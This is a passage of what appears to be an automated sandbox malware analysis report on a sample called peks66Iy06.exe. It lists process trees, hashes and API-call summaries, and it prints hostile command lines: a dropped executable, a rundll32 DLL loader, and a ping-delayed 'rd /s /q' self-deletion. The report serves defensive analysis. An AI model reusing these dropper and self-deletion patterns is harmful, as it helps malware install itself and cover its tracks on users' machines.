Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:26:52
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 2
Imagebase:	0x120000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:26:53
Start date:	11/12/2024
Path:	C:\nfxboms.exe
Wow64 process (32bit):	true
Commandline:	c:\nfxboms.exe "C:\Users\user\Desktop\peks66Iy06.exe"
Imagebase:	0x400000
File size:	149'723 bytes
MD5 hash:	ACEED05E90B445A035B36096437E8A42
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:26:53
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system32\rundll32.exe "c:\ijbbn\gduol.dll",init c:\nfxboms.exe
Imagebase:	0x930000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	10:27:09
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\windows\SysWOW64\rundll32.exe" "c:\ijbbn\gduol.dll",init
Imagebase:	0x930000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:27:09
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:27:10
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:27:10
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x120000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:54:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\windows\SysWOW64\rundll32.exe" "c:\ijbbn\gduol.dll",init
Imagebase:	0x930000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 7200, Parent PID: 7280

General

Target ID:	20
Start time:	11:54:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ijbbn"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7188, Parent PID: 7200

General

Target ID:	21
Start time:	11:54:51
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	11:54:51
Start date:	11/12/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 3
Imagebase:	0x120000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.9%
Total number of Nodes:	263
Total number of Limit Nodes:	3

Executed Functions

Function 00401220 Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 136
sleepfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7C2DD0.MFC42(00100000), ref: 0040122F
__p___argv.MSVCRT ref: 00401253

Part of subcall function 00401140: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B

__p___argv.MSVCRT ref: 00401274

Part of subcall function 00401140: ReadFile.KERNELBASE(00000000,?,00001000,?,00000000), ref: 004011C2
Part of subcall function 00401140: CloseHandle.KERNELBASE(00000000), ref: 004011FD

Sleep.KERNEL32(00000064), ref: 00401286
GetTickCount.KERNEL32 ref: 004012CD
wsprintfA.USER32 ref: 004012EA
CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
6D7C2DD0.MFC42(00000000), ref: 00401313
Sleep.KERNELBASE(00000064), ref: 00401321
WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401331
Sleep.KERNELBASE(00000064), ref: 00401339
WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00401349
CloseHandle.KERNELBASE(00000000), ref: 00401350
6D7C2C70.MFC42(?), ref: 00401357
6D7C2C70.MFC42(00000000,?), ref: 0040135D
__p___argv.MSVCRT ref: 0040137D
wsprintfA.USER32 ref: 0040139A
WinExec.KERNEL32(?,00000000), ref: 004013AD
Sleep.KERNELBASE(000001F4,?,?,?,?,00000000,?), ref: 004013B8
ExitProcess.KERNEL32 ref: 004013BC

Strings

c:\%s.exe, xrefs: 004012DE
cmd.exe /c ping 127.0.0.1 -n 2&%s "%s", xrefs: 00401394

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: File$Sleep$__p___argv$CloseCreateHandleWritewsprintf$CountExecExitProcessReadTick
String ID: c:\%s.exe$cmd.exe /c ping 127.0.0.1 -n 2&%s "%s"
API String ID: 529022016-1443030469
Opcode ID: 66cdd9089e5af76c599511ada205c2659a24278b25b1261c6a6c7d148cee0f40
Instruction ID: 9f8aa6881b80f391e29a048e327f9647279769309d18573ee161f45e2535dee3
Opcode Fuzzy Hash: 66cdd9089e5af76c599511ada205c2659a24278b25b1261c6a6c7d148cee0f40
Instruction Fuzzy Hash: 2B418171504341AFD310EF64DC45FAB7BA9EFC8704F04093DF245AB2E1DA7496048BAA

Function 00401140 Relevance: 4.6, APIs: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040117B
ReadFile.KERNELBASE(00000000,?,00001000,?,00000000), ref: 004011C2
CloseHandle.KERNELBASE(00000000), ref: 004011FD

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 50e04a863f428a76645a255525e8b530e81a62b19e13fed04084e6c9b05c1cd9
Instruction ID: 90d227093b93e33c59d7a42948e498c78a4efe9ee397008c3d7e124e3062c49f
Opcode Fuzzy Hash: 50e04a863f428a76645a255525e8b530e81a62b19e13fed04084e6c9b05c1cd9
Instruction Fuzzy Hash: BC21B431304345ABE724CA28DC41BEBB3D5FB88715F40493DFB95E72D0C6B8A9488A5A

Function 00404578 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7D4ED0.MFC42(?,?,?, E@,00404520,00000000,?,0000000A), ref: 00404588

Strings

E@, xrefs: 00404578

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID:
String ID: E@
API String ID: 0-1021207842
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 10c4685e4c1b6a8bdab444a1996e1c4aa9e8657ff44068a67dc80207ca276c8e
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: 9AB00876018386ABDB12DF919C0192ABAA2BFD8704F484C1DB2A1101A197668438AB16

Non-executed Functions

Function 004013D0 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000086,HTM), ref: 004013E4
LoadResource.KERNEL32(00000000,00000000), ref: 004013FC

Strings

HTM, xrefs: 004013D8
c:\windows\system32\rundll32.exe, xrefs: 004015A7
c:\%s, xrefs: 00401509
D, xrefs: 0040165E
%s\%s.dll, xrefs: 0040155E
WinSta0\Default, xrefs: 00401666
%s "%s",init %s, xrefs: 00401621

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: Resource$FindLoad
String ID: %s "%s",init %s$%s\%s.dll$D$HTM$WinSta0\Default$c:\%s$c:\windows\system32\rundll32.exe
API String ID: 2619053042-2457680838
Opcode ID: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
Instruction ID: 5c017b3d947436da3a79cbd575b5788da6cc5bd4b656b3589a3b64b7cb9d4a99
Opcode Fuzzy Hash: fdddb39bb3cb725529eaf3ce096bf9552d9a8ba29dd7300b0babee306d9bc285
Instruction Fuzzy Hash: DA71E5716083806FD3218B24CC45BEB7BD5EB89704F00492DF6C9AB2D1DAB995098B9B

Function 00401DE0 Relevance: 13.6, APIs: 9, Instructions: 71windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00401DEA
6D7D3130.MFC42 ref: 00401DFF
SendMessageA.USER32(?,00000027,?,00000000), ref: 00401E1B
GetSystemMetrics.USER32(0000000B), ref: 00401E29
GetSystemMetrics.USER32(0000000C), ref: 00401E2F
GetClientRect.USER32(?,?), ref: 00401E3C
DrawIcon.USER32(?,?,?,?), ref: 00401E74
6D7D30D0.MFC42 ref: 00401E7E
6D7CFEB0.MFC42 ref: 00401E8C

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: MetricsSystem$ClientD3130DrawIconIconicMessageRectSend
String ID:
API String ID: 1875806438-0
Opcode ID: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
Instruction ID: db773ba51d367e258aaa0001d282ccedd816923d488996b04dffdd7d1b0f9207
Opcode Fuzzy Hash: d65fc874f4ee7fe65103a4d04c514135e46e03f898aa5041571371461f9f6384
Instruction Fuzzy Hash: 62117CB12047029BC214DF79DD89D6BB7E9FFC8304F084A2DB58AD3290DA34E905CB59

Function 00403B10 Relevance: 45.6, APIs: 25, Strings: 1, Instructions: 149
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7EE820.MFC42(00000001), ref: 00403B34
6D7E52C0.MFC42(user.ini,00000000,00000001), ref: 00403B72
6D7C7770.MFC42 ref: 00403B83
6D7C2DD0.MFC42(00000000), ref: 00403B8B
6D7C76D0.MFC42(00000000,00000000), ref: 00403B9B
6D7CEBC0.MFC42(00000000,00000000), ref: 00403BA8
6D7C8660.MFC42(00000000,00000000,00000000), ref: 00403BB2
6D7EB140.MFC42 ref: 00403BC4
6D7EA880.MFC42(?,00000000,?), ref: 00403BDF
6D7EA8D0.MFC42(?,00000000,00407070,?,00000000,?), ref: 00403BF4
6D7EA880.MFC42(?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C05
6D7EA8D0.MFC42(?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C1B
6D7C90A0.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C2A
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C37
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C45
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C53
6D7CA420.MFC42(00000000,?,00000000,00407248,?,00000000,?,?,00000000,00407070,?,00000000,?), ref: 00403C61
fopen.MSVCRT ref: 00403C70
6D7CA420.MFC42(00407200,00407234,00000000), ref: 00403C88
6D7D59A0.MFC42(00407200,00407234,00000000), ref: 00403C95
fprintf.MSVCRT ref: 00403CB8
fclose.MSVCRT ref: 00403CBF
6D7ED780.MFC42(00407224,00407234,00000000), ref: 00403CD8
6D7ED780.MFC42(00407200,00407234,00000000), ref: 00403CEF
6D7ED780.MFC42(004071E0,00407234,00000000,00000001), ref: 00403D04

Strings

user.ini, xrefs: 00403B69, 00403C6B

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$D780$A880$B140C7770C8660E820fclosefopenfprintf
String ID: user.ini
API String ID: 1956544671-1338118170
Opcode ID: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
Instruction ID: 013291e13a0706baa31a3bd6034cca8677a8dde525ade2333a9cb0047f89d752
Opcode Fuzzy Hash: a6a6fb629337a14a19167b81d9b5a2f6b5228c5787a28112ea1f94429918bd96
Instruction Fuzzy Hash: 2C51D7716483809BD310EB15C845F9BBBE4AFD5718F04096EFA85732C1DB7DA504CA6B

Function 004036D0 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 167
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7E52C0.MFC42(user.ini,00000000), ref: 004036F9
6D7C7770.MFC42 ref: 0040370A
6D7C2DD0.MFC42(00000000), ref: 00403712
6D7C76D0.MFC42(00000000,00000000), ref: 00403722
6D7CEBC0.MFC42(00000000,00000000), ref: 0040372F
6D7C8660.MFC42(00000000,00000000,00000000), ref: 00403739
6D7D56F0.MFC42 ref: 00403747
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00403762
6D7CEC00.MFC42(?,?,0000003B), ref: 00403778

Part of subcall function 004039A0: 6D7CA420.MFC42(00000000,00000000,00402222,?,?,0000003B), ref: 004039C4

6D7CEC00.MFC42(00000015,?,0000003B,00000001), ref: 004037A1
6D7CEC00.MFC42(?,?,0000003B,00000001,00000001), ref: 004037BF
6D7EB590.MFC42(00000021,00000001,00000000,00000001), ref: 004037D9
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404B78), ref: 004037E8
6D7CEC00.MFC42(?,00000001,0000003B,00000001), ref: 0040380C
6D7CEC00.MFC42(?,?,0000003B,00000000,00000001), ref: 0040382A
6D7CEC00.MFC42(00000019,?,0000003B,00000000,-00000001,00000001), ref: 0040384A
6D7EB590.MFC42(?,00000001,00000001), ref: 00403862
6D7C90A0.MFC42 ref: 00403871
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404B78), ref: 0040387E
SendMessageA.USER32(?,00000143,00000000,?), ref: 00403896
6D7CA420.MFC42 ref: 004038AB
6D7CA420.MFC42 ref: 004038B9
6D7D59A0.MFC42 ref: 004038CA

Strings

user.ini, xrefs: 004036F0

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$B590MessageSend$C7770C8660
String ID: user.ini
API String ID: 2938254172-1338118170
Opcode ID: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
Instruction ID: 54062048f7d8e9c3c5b10c10d2f13be0a112b8bce1456f32d0f06b7dcf1a2bd7
Opcode Fuzzy Hash: e2a0c54cd5d71bfe7c8f7115dbcc982c8ab97f2cc07cf54eacd2f770ea5d7972
Instruction Fuzzy Hash: 8151C6F1508341AFC314EB22C856F5F7BE8ABD5B48F004A2DF655662C1DB789608CBA7

Function 00402170 Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 167
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7E52C0.MFC42(user.ini,00000000), ref: 00402199
6D7C7770.MFC42 ref: 004021AA
6D7C2DD0.MFC42(00000000), ref: 004021B2
6D7C76D0.MFC42(00000000,00000000), ref: 004021C2
6D7CEBC0.MFC42(00000000,00000000), ref: 004021CF
6D7C8660.MFC42(00000000,00000000,00000000), ref: 004021D9
6D7D56F0.MFC42 ref: 004021E7
SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402202
6D7CEC00.MFC42(?,?,0000003B), ref: 00402218

Part of subcall function 004039A0: 6D7CA420.MFC42(00000000,00000000,00402222,?,?,0000003B), ref: 004039C4

6D7CEC00.MFC42(00000015,?,0000003B,00000001), ref: 00402241
6D7CEC00.MFC42(?,?,0000003B,00000001,00000001), ref: 0040225F
6D7EB590.MFC42(00000021,00000001,00000000,00000001), ref: 00402279
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404878), ref: 00402288
6D7CEC00.MFC42(?,00000001,0000003B,00000001), ref: 004022AC
6D7CEC00.MFC42(?,?,0000003B,00000000,00000001), ref: 004022CA
6D7CEC00.MFC42(00000019,?,0000003B,00000000,-00000001,00000001), ref: 004022EA
6D7EB590.MFC42(?,00000001,00000001), ref: 00402302
6D7C90A0.MFC42 ref: 00402311
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00404878), ref: 0040231E
SendMessageA.USER32(?,00000143,00000000,?), ref: 00402336
6D7CA420.MFC42 ref: 0040234B
6D7CA420.MFC42 ref: 00402359
6D7D59A0.MFC42 ref: 0040236A

Strings

user.ini, xrefs: 00402190

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$B590MessageSend$C7770C8660
String ID: user.ini
API String ID: 2938254172-1338118170
Opcode ID: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
Instruction ID: afaa56c09f8307c61a21e81d60edd19e1058136c3d77b862272b9fbdbc9fbc74
Opcode Fuzzy Hash: 37e4858ff997d67b506cbc70ba22a13177efcd1f51f67c78ac5313dcec2c17d1
Instruction Fuzzy Hash: 9E51E9B1508341AFC304EB62C856F5F7BE8ABD5748F400A2DFA55662C1DB789608CBA7

Function 00403D20 Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D7EE820.MFC42(00000001), ref: 00403D40
_mbscmp.MSVCRT ref: 00403D57
6D7ED780.MFC42(00407280,00407234,00000000), ref: 00403D72
6D7E52C0.MFC42(user.ini,00000000), ref: 00403D93
6D7C7770.MFC42 ref: 00403DA4
6D7C2DD0.MFC42(00000000), ref: 00403DAC
6D7C76D0.MFC42(00000000,00000000,00000000), ref: 00403DBC
6D7CEBC0.MFC42(00000000,00000000,00000000), ref: 00403DC9
6D7C8660.MFC42(00000000,00000000,00000000,00000000), ref: 00403DD3
6D7EB140.MFC42 ref: 00403DE4
6D7ED780.MFC42(0040725C,00407234,00000000), ref: 00403E00
6D7CA420.MFC42 ref: 00403EA2
6D7D59A0.MFC42 ref: 00403EAF

Strings

user.ini, xrefs: 00403D8A, 00403E32

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: D780$A420B140C7770C8660E820_mbscmp
String ID: user.ini
API String ID: 2834624945-1338118170
Opcode ID: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
Instruction ID: 7586933d42d8af5822a5c6cc992a2378d2c9300e52b0bfec7b5886e4e50d1dbd
Opcode Fuzzy Hash: f68a4b7512e58f0b074adbafbc15d7738ed7276c7fa3a7cd18c7a8ce536ae287
Instruction Fuzzy Hash: F341D1B16483406BC314FF55CC42BAF7654AFD0709F40067EFA06762C1DB7C69088AAB

Function 004019C0 Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 100
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D800310.MFC42(00000066,00000000,?,?,?,?,?,00000000,004047CD,000000FF,004016EF,00000000), ref: 004019E7
6D7C7F20.MFC42(00000066,00000000), ref: 004019F9
6D7C7F20.MFC42(00000066,00000000), ref: 00401A11
6D7C7F20.MFC42(00000066,00000000), ref: 00401A29
6D7C7F20.MFC42(00000066,00000000), ref: 00401A41
6D7C7F20.MFC42(00000066,00000000), ref: 00401A59
6D7C7F20.MFC42(00000066,00000000), ref: 00401A71
6D7C7F20.MFC42(00000066,00000000), ref: 00401A89
6D7D56F0.MFC42(00000066,00000000), ref: 00401AA1
6D7D56F0.MFC42(00000066,00000000), ref: 00401AB3
6D7D56F0.MFC42(00000066,00000000), ref: 00401AC3
6D7D56F0.MFC42(00000066,00000000), ref: 00401AD5
6D7D56F0.MFC42(00000066,00000000), ref: 00401AE5
6D7D5A80.MFC42(004073FC,00000066,00000000), ref: 00401AFC
6D7D5A80.MFC42(004073FC,004073FC,00000066,00000000), ref: 00401B08
6D7D5A80.MFC42(004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B14
6D7D5A80.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B24
6D7C50F0.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B29
